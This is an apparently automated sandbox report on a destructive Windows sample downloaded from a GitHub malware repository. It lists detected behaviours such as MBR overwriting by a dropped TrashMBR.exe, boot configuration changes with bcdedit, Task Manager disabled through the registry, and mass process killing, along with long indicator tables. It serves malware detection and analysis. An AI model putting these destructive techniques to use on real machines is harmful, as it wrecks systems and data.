Malware Analysis Report

2024-12-07 14:30

Sample ID 241014-jmw49asbqb
Target https://github.com/pankoza2-pl/malwaredatabase-old
Tags
bootkit discovery evasion exploit persistence
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

Threat Level: Likely malicious

The file https://github.com/pankoza2-pl/malwaredatabase-old was found to be: Likely malicious.

Malicious Activity Summary

bootkit discovery evasion exploit persistence

Possible privilege escalation attempt

Downloads MZ/PE file

Disables Task Manager via registry modification

Modifies file permissions

Executes dropped EXE

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Writes to the Master Boot Record (MBR)

Modifies boot configuration data using bcdedit

Enumerates connected drives

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Modifies registry key

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Modifies registry class

NTFS ADS

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-14 07:47

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-14 07:47

Reported

2024-10-14 07:49

Platform

win10v2004-20241007-en

Max time kernel

120s

Max time network

122s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pankoza2-pl/malwaredatabase-old

Signatures

Disables Task Manager via registry modification

evasion

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\Win8.Horror.Destructive 1.0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\A: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\WScript.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Modifies boot configuration data using bcdedit

Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\438C.tmp\TrashMBR.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\438C.tmp\TrashMBR.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\438C.tmp\HorrorGui.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Win8.Horror.Destructive 1.0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 60212.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WScript.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WScript.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WScript.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WScript.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\Win8.Horror.Destructive 1.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\438C.tmp\HorrorGui.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1692 wrote to memory of 3204 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 3204 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2424 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2424 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2424 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2424 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2424 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2424 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2424 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2424 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2424 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2424 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2424 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2424 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2424 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2424 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2424 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2424 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2424 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2424 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2424 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1692 wrote to memory of 2424 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pankoza2-pl/malwaredatabase-old

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc0a8746f8,0x7ffc0a874708,0x7ffc0a874718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,6200551882998235220,5271982580265869737,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,6200551882998235220,5271982580265869737,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,6200551882998235220,5271982580265869737,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

